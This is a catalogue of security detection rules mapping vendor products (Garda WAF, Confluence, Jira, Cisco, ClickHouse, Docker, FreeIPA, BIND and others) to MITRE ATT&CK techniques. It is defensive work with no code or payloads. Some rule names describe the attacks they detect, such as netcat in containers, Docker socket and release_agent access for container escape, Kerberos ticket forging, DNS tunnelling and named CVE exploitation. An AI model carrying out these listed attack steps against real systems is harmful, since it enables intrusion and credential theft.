List of detection rules

This table lists the detection rules that have been developed. For each rule it indicates which information system the rule applies to and which MITRE ATT&CK tactics and techniques it covers.

| Vendor | Product | Detection rule ID | Detection rule name | MITRE ATT&CK tactic | MITRE ATT&CK technique / sub-technique | Event source |
|---|---|---|---|---|---|---|
| All vendors | - | RV-D-740 | Indicator of compromise detected | TA0001 (Initial Access), TA0011 (Command and Control), TA0010 (Exfiltration) | T1041 (Exfiltration Over C2 Channel), T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1071.004 (Application Layer Protocol: DNS), T1105 (Ingress Tool Transfer), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1219 (Remote Access Tools), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1566.003 (Phishing: Spearphishing via Service) | - |
| Гарда | Гарда WAF | RV-D-701 | Password guessing for a Garda WAF user account | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-702 | Password Spraying attack against Garda WAF | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-703 | Successful password guessing against Garda WAF | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-704 | Garda WAF pattern disabled or modified | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-705 | Attack on a Garda WAF web application | TA0001 (Initial Access), TA0003 (Persistence) | T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-706 | Multiple attack on a Garda WAF web application | TA0001 (Initial Access), TA0003 (Persistence) | T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-707 | Multiple attacks on a Garda WAF web application | TA0001 (Initial Access), TA0003 (Persistence) | T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-708 | Critical role added to a Garda WAF user | TA0003 (Persistence) | T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-723 | Protection settings of a connected server changed | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | Гарда WAF |
| Гарда | Гарда WAF | RV-D-724 | Mass deletion of Garda WAF accounts | TA0040 (Impact) | T1531 (Account Access Removal) | Гарда WAF |
| Код Безопасности | Континент | RV-D-79 | Successful password guessing against a Continent TLS server | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| Код Безопасности | Континент | RV-D-80 | Password guessing against a Continent TLS server | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| Код Безопасности | Континент | RV-D-81 | Continent password guessing via Password Spraying | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | - |
| Код Безопасности | Континент | RV-D-82 | Privileged user login to a Continent device from an unknown host | TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | - |
| Код Безопасности | Secret Net Studio | RV-D-496 | Secret Net Studio event log cleared | TA0005 (Defense Evasion) | T1070 (Indicator Removal), T1070.009 (Indicator Removal: Clear Persistence) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-497 | Login by a blacklisted user | TA0001 (Initial Access), TA0005 (Defense Evasion) | T1078 (Valid Accounts) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-498 | System object integrity violation | TA0040 (Impact) | T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-499 | Mass unblocking of Secret Net Studio hosts | TA0005 (Defense Evasion) | T1211 (Exploitation for Defense Evasion) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-500 | Mass blocking of Secret Net Studio hosts | TA0040 (Impact) | T1499 (Endpoint Denial of Service) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-501 | Secret Net Studio security policy changed | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-502 | Multiple password changes for an account | TA0003 (Persistence), TA0040 (Impact) | T1098 (Account Manipulation), T1531 (Account Access Removal) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-503 | Firewall rules changed in Secret Net Studio | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-504 | Critical account modified | TA0040 (Impact) | T1098 (Account Manipulation), T1531 (Account Access Removal) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-505 | Protection mechanism disabled in Secret Net Studio | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-506 | Self-protection mechanism disabled in Secret Net Studio | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | SNS audit events |
| Код Безопасности | Secret Net Studio | RV-D-507 | Removable device connected to a computer | TA0009 (Collection) | T1025 (Data from Removable Media) | SNS audit events |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-520 | Privileged-mode password changed | TA0003 (Persistence) | T1098 (Account Manipulation) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-521 | User created on S-Terra Gate | TA0003 (Persistence) | T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-522 | Privileged mode entered on S-Terra Gate | TA0004 (Privilege Escalation), TA0003 (Persistence) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-523 | Configuration file cleared on S-Terra Gate | TA0005 (Defense Evasion) | T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-524 | Privileged-mode password guessing | TA0006 (Credential Access) | T1110 (Brute Force) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-525 | Log forwarding configured to an unknown host | TA0002 (Execution) | T1059 (Command and Scripting Interpreter), T1059.008 (Command and Scripting Interpreter: Network Device CLI) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-526 | Maximum privileges granted to a user | TA0004 (Privilege Escalation) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation), T1548 (Abuse Elevation Control Mechanism) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-527 | File deleted on S-Terra Gate | TA0040 (Impact) | T1485 (Data Destruction), T1136.001 (Create Account: Local Account), T1485.001 (Data Destruction: Lifecycle-Triggered Deletion) | - |
| С-Терра СиЭсПи | С-Терра Шлюз | RV-D-528 | Event forwarding disabled on S-Terra Gate | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | - |
| Солар | Solar webProxy | RV-D-199 | Multiple failed authentication attempts on the SWP system | TA0006 (Credential Access) | T1110 (Brute Force) | - |
| Солар | Solar webProxy | RV-D-200 | Successful user password guessing on Solar Web Proxy | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| Солар | Solar webProxy | RV-D-201 | External connection parameters changed on Solar Web Proxy | TA0005 (Defense Evasion) | T1562 (Impair Defenses) | - |
| Солар | Solar webProxy | RV-D-202 | Firewall and access rules changed in Solar Web Proxy | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools), T1562.004 (Impair Defenses: Disable or Modify System Firewall) | - |
| Солар | Solar webProxy | RV-D-203 | Critical system parameters of Solar Web Proxy changed | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | - |
| Солар | Solar webProxy | RV-D-204 | Privileged account login from an unknown IP to the SWP server | TA0004 (Privilege Escalation) | T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts) | - |
| Солар | Solar webProxy | RV-D-205 | New user created in Solar Web Proxy | TA0003 (Persistence) | T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account) | - |
| Солар | Solar webProxy | RV-D-206 | Role with critical permissions created or modified on Solar Web Proxy | TA0003 (Persistence) | T1098 (Account Manipulation) | - |
| Солар | Solar webProxy | RV-D-207 | Account parameters changed on Solar Web Proxy | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1098 (Account Manipulation) | - |
| Atlassian | Confluence | RV-D-24 | Bulk download of Confluence pages | TA0009 (Collection) | T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-25 | Confluence space download | TA0009 (Collection) | T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-26 | Multiple login attempts on the Confluence web server | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-27 | Confluence application audit logging disabled | TA0005 (Defense Evasion) | T1562 (Impair Defenses) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-28 | Exploitation of a Confluence vulnerability - CVE-2023-22515 | TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution) | T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-29 | Exploitation of a Confluence vulnerability - CVE-2023-22518 | TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution) | T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-30 | Exploitation of a Confluence vulnerability - CVE-2023-22527 | TA0004 (Privilege Escalation), TA0001 (Initial Access), TA0002 (Execution) | T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-31 | OGNL injection via Java expressions in Confluence | TA0002 (Execution) | T1203 (Exploitation for Client Execution) | confluence_access.log, access.log |
| Atlassian | Confluence | RV-D-32 | Mass creation of Confluence pages | TA0040 (Impact) | T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation), T1491 (Defacement), T1491.001 (Defacement: Internal Defacement), T1491.002 (Defacement: External Defacement) | confluence_access.log, access.log |
| Atlassian | Jira | RV-D-70 | Jira backup created | TA0009 (Collection), TA0040 (Impact) | T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| Atlassian | Jira | RV-D-71 | Dump of multiple Jira issues | TA0009 (Collection), TA0040 (Impact) | T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| Atlassian | Jira | RV-D-72 | Export of multiple Jira issues | TA0009 (Collection), TA0040 (Impact) | T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| Atlassian | Jira | RV-D-73 | Multiple failed login attempts to Jira | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| Atlassian | Jira | RV-D-74 | Jira logging configuration changed | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | - |
| Atlassian | Jira | RV-D-75 | Mass issue creation by a user in Jira | TA0040 (Impact) | T1499 (Endpoint Denial of Service), T1499.003 (Endpoint Denial of Service: Application Exhaustion Flood), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| Atlassian | Jira | RV-D-76 | Mass issue deletion by a user in Jira | TA0040 (Impact) | T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| Atlassian | Jira | RV-D-77 | User created in Jira | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account) | - |
| Atlassian | Jira | RV-D-78 | User added to critical groups | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups) | - |
| Atlassian | Jira | RV-D-482 | Exploitation of a Jira vulnerability - CVE-2023-26256 | TA0007 (Discovery), TA0001 (Initial Access), TA0005 (Defense Evasion), TA0006 (Credential Access), TA0009 (Collection) | T1083 (File and Directory Discovery), T1190 (Exploit Public-Facing Application), T1211 (Exploitation for Defense Evasion), T1212 (Exploitation for Credential Access), T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence), T1552 (Unsecured Credentials), T1552.008 (Unsecured Credentials: Chat Messages) | - |
| Cisco | ASA | RV-D-5 | Successful password guessing for Cisco ASA privileged mode | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | Syslog (EventID_308001, EventID_502103) |
| Cisco | ASA | RV-D-6 | Password guessing via SSH against Cisco ASA | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying) | Syslog (EventID_113015) |
| Cisco | ASA | RV-D-7 | Successful password guessing via SSH against Cisco ASA | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | Syslog (EventID_113012, EventID_113015) |
| Cisco | ASA | RV-D-8 | Privileged mode access after authorization | TA0004 (Privilege Escalation) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | Syslog (EventID_113012, EventID_502103) |
| Cisco | IOS | RV-D-1 | Password guessing against a Cisco IOS device via Password Spraying | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | Syslog (Login failed) |
| Cisco | IOS | RV-D-2 | Successful password guessing against a Cisco IOS device | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | Syslog (Login failed, Login success) |
| Cisco | IOS | RV-D-3 | Password guessing against a Cisco IOS device | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | Syslog (Login failed) |
| Cisco | IOS | RV-D-4 | Privileged user login to a Cisco IOS device from an unknown host | TA0006 (Credential Access), TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts) | Syslog (Login success) |
| ClickHouse | ClickHouse | RV-D-9 | Use of LIKE for reconnaissance in ClickHouse | TA0009 (Collection) | T1005 (Data from Local System) | - |
| ClickHouse | ClickHouse | RV-D-10 | Password guessing against the ClickHouse DBMS | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| ClickHouse | ClickHouse | RV-D-11 | ClickHouse database configuration changed | TA0003 (Persistence), TA0005 (Defense Evasion), TA0007 (Discovery), TA0006 (Credential Access) | T1003 (OS Credential Dumping), T1087 (Account Discovery), T1556 (Modify Authentication Process), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | - |
| ClickHouse | ClickHouse | RV-D-12 | Insecure ClickHouse user authentication method | TA0003 (Persistence), TA0004 (Privilege Escalation), TA0006 (Credential Access) | T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1552 (Unsecured Credentials) | - |
| ClickHouse | ClickHouse | RV-D-13 | Table dump created in ClickHouse | TA0006 (Credential Access), TA0009 (Collection) | T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging) | - |
| ClickHouse | ClickHouse | RV-D-14 | Password Spraying attack against the ClickHouse DBMS | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| ClickHouse | ClickHouse | RV-D-15 | Privileged user login to a ClickHouse database from an unknown host | TA0006 (Credential Access), TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | - |
| ClickHouse | ClickHouse | RV-D-16 | Successful password guessing against the ClickHouse DBMS | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | - |
| ClickHouse | ClickHouse | RV-D-17 | ClickHouse audit table modified or deleted | TA0005 (Defense Evasion), TA0040 (Impact) | T1070 (Indicator Removal), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| ClickHouse | ClickHouse | RV-D-18 | File system interaction from the ClickHouse database | TA0002 (Execution), TA0007 (Discovery), TA0040 (Impact) | T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python), T1083 (File and Directory Discovery), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation) | - |
| ClickHouse | ClickHouse | RV-D-19 | System information retrieval in ClickHouse | TA0007 (Discovery) | T1082 (System Information Discovery), T1083 (File and Directory Discovery) | - |
| ClickHouse | ClickHouse | RV-D-20 | ClickHouse structure information retrieval | TA0006 (Credential Access), TA0007 (Discovery) | T1003 (OS Credential Dumping), T1069 (Permission Groups Discovery), T1069.001 (Permission Groups Discovery: Local Groups), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account) | - |
| ClickHouse | ClickHouse | RV-D-21 | Attempt to delete a ClickHouse database | TA0040 (Impact) | T1485 (Data Destruction) | - |
| ClickHouse | ClickHouse | RV-D-22 | Attempt to delete multiple ClickHouse tables | TA0040 (Impact) | T1485 (Data Destruction) | - |
| ClickHouse | ClickHouse | RV-D-23 | Privileged user created in ClickHouse | TA0003 (Persistence), TA0004 (Privilege Escalation) | T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account) | - |
| Docker | Docker Desktop | RV-D-33 | Use of debugs in a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-34 | netcat process launched in a container | TA0002 (Execution), TA0004 (Privilege Escalation) | T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-35 | Process launched from /dev/shm in a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-36 | Interactive shell launched in a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-37 | kubectl launched in a container | TA0004 (Privilege Escalation) | T1609 (Container Administration Command), T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-38 | mknod launched in a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-39 | mount launched in a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-40 | Access to the Docker socket file from a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-41 | Access to release_agent from a container | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Docker | Docker Desktop | RV-D-42 | Attempted exploitation of a runc vulnerability | TA0004 (Privilege Escalation) | T1611 (Escape to Host) | R-Point |
| Eltex | vESR | RV-D-43 | Password guessing against an Eltex vESR router via Password Spraying | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | - |
| Eltex | vESR | RV-D-44 | Successful password guessing against an Eltex vESR router | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | - |
| Eltex | vESR | RV-D-45 | Password guessing against an Eltex vESR router | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | - |
| Eltex | vESR | RV-D-46 | Privileged user login to an Eltex vESR router from an unknown host | TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts) | - |
| FreeIPA | FreeIPA | RV-D-47 | Ticket CCACHE file read | TA0006 (Credential Access) | T1558 (Steal or Forge Kerberos Tickets), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files) | Auditd |
| FreeIPA | FreeIPA | RV-D-48 | Golden Ticket attack on FreeIPA | TA0006 (Credential Access) | T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket) | Auditd |
| FreeIPA | FreeIPA | RV-D-49 | FreeIPA backup performed | TA0006 (Credential Access) | T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync) | Auditd |
| FreeIPA | FreeIPA | RV-D-50 | Successful FreeIPA user password guessing | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | KRB5KDC |
| FreeIPA | FreeIPA | RV-D-51 | FreeIPA LDAP secrets read | TA0006 (Credential Access) | T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync) | Auditd |
| FreeIPA | FreeIPA | RV-D-52 | Silver Ticket attack on FreeIPA | TA0006 (Credential Access) | T1558 (Steal or Forge Kerberos Tickets), T1558.002 (Steal or Forge Kerberos Tickets: Silver Ticket), T1558.005 (Steal or Forge Kerberos Tickets: Ccache Files) | Auditd |
| FreeIPA | FreeIPA | RV-D-53 | FreeIPA user password guessing | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | KRB5KDC |
| FreeIPA | FreeIPA | RV-D-54 | Use of the kadmin utility | TA0003 (Persistence) | T1003 (OS Credential Dumping), T1098 (Account Manipulation), T1134 (Access Token Manipulation), T1543 (Create or Modify System Process) | Auditd |
| FreeIPA | FreeIPA | RV-D-55 | IPA user/role reconnaissance | TA0007 (Discovery) | T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account) | error_log |
| FreeIPA | FreeIPA | RV-D-56 | Login shell changed via FreeIPA | TA0002 (Execution) | T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell) | error_log |
| FreeIPA | FreeIPA | RV-D-57 | FreeIPA services stopped/restarted | TA0040 (Impact) | T1489 (Service Stop) | Auditd |
| FreeIPA | FreeIPA | RV-D-58 | FreeIPA configuration changed via API | TA0003 (Persistence) | T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication) | error_log |
| FreeIPA | FreeIPA | RV-D-59 | FreeIPA management files modified | TA0003 (Persistence) | T1036 (Masquerading), T1574 (Hijack Execution Flow) | Auditd |
| FreeIPA | FreeIPA | RV-D-60 | Permission configuration changed in FreeIPA | TA0003 (Persistence) | T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication) | error_log |
| FreeIPA | FreeIPA | RV-D-61 | Privilege configuration changed in FreeIPA | TA0003 (Persistence) | T1098 (Account Manipulation), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication) | error_log |
| FreeIPA | FreeIPA | RV-D-62 | Role configuration changed in FreeIPA | TA0003 (Persistence) | T1098 (Account Manipulation) | error_log |
| FreeIPA | FreeIPA | RV-D-63 | FreeIPA server configuration changed | TA0003 (Persistence) | T1003 (OS Credential Dumping), T1136 (Create Account), T1136.002 (Create Account: Domain Account), T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication) | Auditd |
| FreeIPA | FreeIPA | RV-D-64 | Kerberos server configuration changed | TA0003 (Persistence) | T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication) | Auditd |
| FreeIPA | FreeIPA | RV-D-65 | LDAP server configuration changed | TA0003 (Persistence) | T1556 (Modify Authentication Process), T1556.001 (Modify Authentication Process: Domain Controller Authentication), T1558 (Steal or Forge Kerberos Tickets) | Auditd |
| FreeIPA | FreeIPA | RV-D-66 | sudo configuration changed in FreeIPA | TA0004 (Privilege Escalation) | T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching) | error_log |
| FreeIPA | FreeIPA | RV-D-67 | HBAC rule added via FreeIPA | TA0004 (Privilege Escalation) | T1098 (Account Manipulation) | error_log |
| GitHub | GitHub | RV-D-68 | Exploitation of a GitHub Enterprise Server vulnerability - CVE-2024-0507 | TA0002 (Execution), TA0004 (Privilege Escalation) | T1068 (Exploitation for Privilege Escalation), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution) | haproxy.log, access.log |
| InfoWatch | Traffic Monitor | RV-D-609 | Brute Force attack against InfoWatch TM | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-610 | InfoWatch TM audit policy disabled | TA0005 (Defense Evasion) | T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-611 | Mass deletion of InfoWatch TM accounts | TA0040 (Impact) | T1531 (Account Access Removal) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-612 | Administrator created in InfoWatch TM | TA0003 (Persistence) | T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1136 (Create Account), T1136.001 (Create Account: Local Account) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-613 | Administrator role created in InfoWatch TM | TA0003 (Persistence) | T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-614 | Successful Brute Force attack against InfoWatch TM | TA0006 (Credential Access) | T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-615 | Password Spraying in InfoWatch TM | TA0006 (Credential Access) | T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying) | arc_view_audit_log |
| InfoWatch | Traffic Monitor | RV-D-616 | Administrator login to InfoWatch TM | TA0001 (Initial Access) | T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts) | arc_view_audit_log |
| Internet Systems Consortium | BIND | RV-D-636 | Multiple DNS queries from a single device | TA0010 (Exfiltration) | T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS) | queries.log |
| Internet Systems Consortium | BIND | RV-D-638 | DNS query to Telegram API resources detected | TA0011 (Command and Control), TA0010 (Exfiltration) | T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication) | queries.log |
| Internet Systems Consortium | BIND | RV-D-639 | DNS query to Monero pools detected | TA0040 (Impact) | T1496 (Resource Hijacking), T1496.001 (Resource Hijacking: Compute Hijacking) | queries.log |
| Internet Systems Consortium | BIND | RV-D-640 | DNS query to suspicious external services detected | TA0001 (Initial Access), TA0043 (Reconnaissance) | T1190 (Exploit Public-Facing Application), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning) | queries.log |
| Internet Systems Consortium | BIND | RV-D-643 | DNS zone transfer to an untrusted host (AXFR) | TA0043 (Reconnaissance) | T1590 (Gather Victim Network Information), T1590.002 (Gather Victim Network Information: DNS) | default.log |
| Internet Systems Consortium | BIND | RV-D-644 | DNS query to the WannaCry killswitch domain detected | TA0002 (Execution) | T1204 (User Execution), T1204.002 (User Execution: Malicious File) | queries.log |
| Internet Systems Consortium | BIND | RV-D-647 | DNS tunnel usage | TA0010 (Exfiltration), TA0011 (Command and Control) | T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1132 (Data Encoding), T1132.001 (Data Encoding: Standard Encoding) | queries.log |
